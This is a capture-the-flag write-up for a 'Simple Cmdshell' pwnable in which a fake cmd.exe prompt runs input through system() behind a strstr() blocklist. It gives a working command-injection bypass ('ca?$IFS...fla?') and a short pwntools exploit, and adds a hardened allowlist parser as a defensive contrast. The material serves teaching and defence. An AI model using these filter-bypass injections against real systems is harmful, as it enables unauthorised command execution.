# [PWNABLE] Simple Cmdshell

:::warning
Copyright ⓒ 2021 by CSTEC. All contents cannot be copied without permission.
:::

## Analysis

The program mimics the interactive shell of Windows `cmd.exe`: it prints a fake banner and prompt and then waits for a command.

```
root@computer:~# nc 0 7147
Microsoft Windows [Version 10.0.18363.836]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Users\user>
```

## Vulnerability

The command handler reads one word with `scanf("%4096s")`, runs two `strstr()` checks on it, and passes it straight to `system()`:

```asm
.text:00000000000008A7 1018 48 8D 85 F0 EF FF FF    lea     rax, [rbp+haystack]
.text:00000000000008AE 1018 48 89 C6                mov     rsi, rax
.text:00000000000008B1 1018 48 8D 3D DF 00 00 00    lea     rdi, a4096s        ; "%4096s"
.text:00000000000008B8 1018 B8 00 00 00 00          mov     eax, 0
.text:00000000000008BD 1018 E8 0E FE FF FF          call    ___isoc99_scanf
.text:00000000000008C2 1018 48 8D 85 F0 EF FF FF    lea     rax, [rbp+haystack]
.text:00000000000008C9 1018 48 8D 35 CE 00 00 00    lea     rsi, needle        ; "flag"
.text:00000000000008D0 1018 48 89 C7                mov     rdi, rax           ; haystack
.text:00000000000008D3 1018 E8 08 FE FF FF          call    _strstr
.text:00000000000008D8 1018 48 85 C0                test    rax, rax
.text:00000000000008DB 1018 75 B2                   jnz     short loc_88F
.text:00000000000008DD 1018 48 8D 85 F0 EF FF FF    lea     rax, [rbp+haystack]
.text:00000000000008E4 1018 48 8D 35 B8 00 00 00    lea     rsi, aCat          ; "cat"
.text:00000000000008EB 1018 48 89 C7                mov     rdi, rax           ; haystack
.text:00000000000008EE 1018 E8 ED FD FF FF          call    _strstr
.text:00000000000008F3 1018 48 85 C0                test    rax, rax
.text:00000000000008F6 1018 75 97                   jnz     short loc_88F
.text:00000000000008F8 1018 48 8D 85 F0 EF FF FF    lea     rax, [rbp+haystack]
.text:00000000000008FF 1018 48 89 C7                mov     rdi, rax           ; command
.text:0000000000000902 1018 E8 99 FD FF FF          call    _system
```

The binary rejects any input that contains the substrings `cat` or `flag`, which blocks the obvious `cat flag`. The check is only a substring blocklist on the raw line, however, and the line is then handed to `system()`, i.e. to `/bin/sh`. Two shell features get around it: the `$IFS` variable expands to whitespace (this also supplies the space that `%4096s` cannot read, since `%s` stops at the first whitespace character), and the `?` wildcard matches any single character, so `ca?` and `fla?` are expanded by the shell to `cat` and `flag` only after the filter has already passed.
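To show why a substring blocklist in front of `system()` is the wrong control and what a fix looks like, here is an added example (not the challenge binary's code). `blocklist_allows()` reconstructs the `strstr()` check from the disassembly above; `hardened_parse()` is a hypothetical replacement that tokenises the line into an `argv[]`, accepts only an allowlisted command name (the list `ls`/`echo`/`whoami` is assumed for the example) and rejects any argument containing characters outside `[A-Za-z0-9._-]`, so the caller can run the result with `execvp()` and no shell ever sees `$IFS`, `?` or `;`. The inputs in `main()` are constructed for the demonstration.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Reconstruction of the check the challenge binary performs before
 * system(): the line is rejected if "flag" or "cat" occurs anywhere in it. */
int blocklist_allows(const char *cmd)
{
    return strstr(cmd, "flag") == NULL && strstr(cmd, "cat") == NULL;
}

#define MAX_ARGS 8

/* Allowlist of command names (hypothetical, chosen for this example). */
static const char *const allowed_cmds[] = { "ls", "echo", "whoami" };

static int is_allowed_cmd(const char *name)
{
    size_t n = sizeof allowed_cmds / sizeof allowed_cmds[0];
    for (size_t i = 0; i < n; i++)
        if (strcmp(name, allowed_cmds[i]) == 0)
            return 1;
    return 0;
}

/* Every character of an argument must be alphanumeric or one of '.', '-', '_'.
 * That excludes '/', '?', '*', '$', ';', '|', '&', quotes and whitespace, so
 * neither path traversal nor globbing nor shell syntax can be expressed.
 * A leading '-' is refused too, so arguments cannot become options. */
static int arg_is_clean(const char *arg)
{
    if (*arg == '\0' || *arg == '-')
        return 0;
    for (const unsigned char *p = (const unsigned char *)arg; *p; p++)
        if (!isalnum(*p) && *p != '.' && *p != '-' && *p != '_')
            return 0;
    return strcmp(arg, ".") != 0 && strcmp(arg, "..") != 0;
}

static int is_sep(char c)
{
    return c == ' ' || c == '\t' || c == '\r' || c == '\n';
}

/* Hardened replacement for the strstr()+system() pattern.
 * Splits `line` on whitespace into a NULL-terminated argv[] stored inside
 * `buf` (which must hold strlen(line)+1 bytes). Returns argc on success and
 * 0 if the line is rejected. The caller is expected to run argv[] with
 * execvp()/posix_spawnp(), never system(), so tokens reach the program
 * verbatim: $IFS and '?' are never expanded because no shell interprets them. */
int hardened_parse(const char *line, char *buf, size_t buflen, char **argv, int max_args)
{
    if (strlen(line) + 1 > buflen || max_args < 2)
        return 0;
    strcpy(buf, line);

    int argc = 0;
    char *p = buf;
    while (*p) {
        while (is_sep(*p))
            p++;
        if (!*p)
            break;
        if (argc >= max_args - 1)      /* leave room for the NULL terminator */
            return 0;
        argv[argc++] = p;
        while (*p && !is_sep(*p))
            p++;
        if (*p)
            *p++ = '\0';
    }
    argv[argc] = NULL;

    for (int i = 0; i < argc; i++)
        if (!arg_is_clean(argv[i]))
            return 0;
    if (argc == 0 || !is_allowed_cmd(argv[0]))
        return 0;
    return argc;
}

int main(void)
{
    /* Constructed inputs: the writeup's bypass string plus some plain lines. */
    const char *inputs[] = {
        "cat flag", "/bin/ca?$IFS/home/simple_cmdshell/fla?",
        "ls", "echo hello world", "echo a;ls"
    };
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        char buf[256];
        char *argv[MAX_ARGS];
        printf("%-42s blocklist=%-6s hardened argc=%d\n", inputs[i],
               blocklist_allows(inputs[i]) ? "allows" : "blocks",
               hardened_parse(inputs[i], buf, sizeof buf, argv, MAX_ARGS));
    }
    return 0;
}
```

The run makes the gap visible: the blocklist stops `cat flag` but lets the `ca?$IFS...fla?` line through, while the hardened parser rejects both (one for the unlisted command name, the other for the `/`, `?` and `$` characters) and only yields an `argv[]` for lines such as `echo hello world`. The key design change is not a better blocklist but removing the shell from the path entirely.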
## Exploit

```python
from pwn import *

io = remote('0', 7147)

# Wait for the fake cmd.exe prompt, then send the filter-bypassing command:
# 'ca?' is expanded by the shell's '?' glob to 'cat', '$IFS' expands to a
# space, and 'fla?' expands to 'flag'. Neither "cat" nor "flag" appears
# literally, so the strstr() blocklist passes the line on to system().
io.sendlineafter(b'C:\\Users\\user>', b'/bin/ca?$IFS/home/simple_cmdshell/fla?')
io.interactive()
```